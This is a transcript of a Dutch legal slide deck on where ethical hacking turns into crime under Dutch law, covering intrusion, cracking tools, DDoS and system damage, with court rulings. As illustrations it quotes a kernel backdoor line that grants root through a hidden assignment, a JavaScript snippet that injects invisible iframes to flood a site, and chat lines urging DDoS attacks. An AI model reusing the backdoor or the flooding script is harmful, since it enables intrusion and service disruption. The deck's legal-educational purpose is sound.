Legaal hacken: waar ligt de grens?
37
-
Upload
arnoud-engelfriet -
Category
Technology
-
view
13.351 -
download
3
description
Wat is het verschil tussen de TNT-staking en de DDoS?-aanvallen op Paypal? Mag je je eigen bank hacken om te zien of ze wel veilig genoeg zijn voor je geld? En als je de ov-chipkaart gekraakt hebt, mag je dan als proof of concept ermee gaan reizen? De wet stelt grenzen aan ethisch hacken, maar is niet zwart-wit. Dezelfde handeling kan legaal of illegaal zijn afhankelijk van je intentie en de omstandigheden waaronder je deze begaat.
Transcript of Legaal hacken: waar ligt de grens?
Computervredebreuk(art. 138a Strafrecht)
Opzettelijk en wederrechtelijkbinnendringen
in een geautomatiseerd werk
Doorbreken van een beveiliging
if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL;
Gebruik van valse signalenof een valse sleutel
Aannemen van eenAannemen van eenvalse hoedanigheidvalse hoedanigheid
Computervredebreuk(art. 138a Strafrecht)
Maar OOK als het systeem onbeveiligd is!
Computervredebreuk(art. 138a Strafrecht)
Citaat van de minister (2006):
“Wel moet het voor de potentiële dader kenbaar zijn dat hij zich op verboden terrein bevindt.”
Wetsvoorstel Computercriminaliteit II, Memorie van Toelichting (TK 26671 nr. 3)
Rb. Den Haag 2 april 2010,LJN: BM1481
Cracking tools(art. 139d Strafrecht)
Technisch hulpmiddel dathoofdzakelijk geschikt of
ontworpen is om computervredebreuk mee te plegen
Hoge Raad 29-03-2005, LJN: AS4663
“Voorzover de voorzieningenrechter kan nagaan bevatten de twee ‘Attacks’ een in hoge mate theoretisch wiskundige beschrijving, maar bevat het artikel in ieder geval zeker niet een praktische handleiding voor het kraken en klonen van de chip.”
Rechtbank Arnhem 18-07-2008, LJN: BD7578
Denial of service(art. 138b Strafrecht)
Opzettelijk en wederrechtelijktoegang tot computer of netwerk
belemmeren doortoezenden van gegevens
for(var i =0; i<1; i++) {ip = new Array();for(var j=0; j<4; j++){
ip.push(Math.round(Math.random()*255)); }ip = ip.join('.');document.write('<iframe
src="http://bluf2008.geencommentaar.nl/isGeenStijl.php?ip='+ip+'" width="1" height="1" style="position: absolute; top: -50px;"></iframe>');}
Beschadigen van systemen(art. 161sexies Strafrecht)
Opzettelijk en wederrechtelijkcomputersysteem of netwerk
vernielen, beschadigen of onbruikbaar maken
Beschadigen van systemen(art. 161sexies Strafrecht)
Strafverhoging als daarbijgemeen gevaar voor goederen
of diensten optreedt
(en nog meer bij levensgevaar)
Rechtbank Rotterdam 14-4-2010,LJN: BM1172
Rechtbank Rotterdam 14-4-2010,LJN: BM1172
“De providers Argeweb en Leaseweb faciliteren het internetverkeer van ruim 50.000 klanten. De infrastructuur van deze providers kan derhalve worden gezien als een vitale infrastructuur.”
<0x1fe> was je nog van plan overheid.nl te ddossen?...<0x1fe> waarom doen wij dat niet nu?
Rechtbank 's-Gravenhage 14-3-2005LJN: AT0222
<0x1fe> kan iedereen ff geenstijl.nl pakken (…) aub?
Rechtbank 's-Gravenhage 14-3-2005LJN: AT0222
“Journalists cannot, in principle, be released from their duty to obey the ordinary criminal law on the basis that Article 10 affords them protection”
“It falls to be decided whether, in the particular circumstances of the case, the interest in the public's being informed outweighed the 'duties and responsibilities' the journalists had as a result of the suspect origin of the documents that were sent to them.”
EHRM 21 januari 1999, NJ 1999, 713
HR 27 juni 1995, NJ 1995, 711
“Nu het aan de verdachte ten laste gelegde het doel van zijn onderzoek (publiekelijk bewijs te vergaren voor zijn stellingen) voorbij is geschoten en hem andere, minder verstrekkende methodes ten dienste stonden...”
Hoge Raad 5-12-2006LJN AY8343
Rechtbank 's-Gravenhage 23-11-2009,LJN: BK4065
Rechtbank Amsterdam 20-04-2005,LJN: AT4199
“Openbaarmaking dient geen publiek belang: zij levert geen enkele bijdrage aan het publieke debat over een maatschappelijk relevante kwestie en heeft geen ander doel dan de bevrediging van de nieuwsgierigheid van een sensatiebelust publiek.”
Rechtbank Amsterdam 20-04-2005,LJN: AT4199
http://www.e-beat.nl/examen.php?id=174&cijfer=7.5
Rechtbank Breda, 6 januari 2009, LJN: BG9038
“Om te beginnen is voldoende aannemelijk dat in dit geval sprake is van een goedbedoelde en onschuldige actie van de werknemer van Handyman, juist gericht op het behartigen van het belang van The BEAT Factory, die dit zeer wel zó kon begrijpen en er zó ook profijt van had kunnen hebben.”
EHRM 12 februari 2008, Guja vs Moldavië, zaaknr. 14277/04.
“Het Hof overweegt dat het algemeen belang op toegang tot informatie over ongepaste druk en misstanden in het Openbaar Ministerie zó belangrijk is in een democratische rechtsstaat dat het zwaarder weegt dan het belang om het vertrouwen in datzelfde Openbaar Ministerie te beschermen.”
EHRM 6 mei 2003, Appleby vs. UKzaaknr. 44306/98
“Een eerlijke balans die moet worden getroffen tussen het algemeen belang van de gemeenschap en de belangen van het individu.”
@ICTRecht
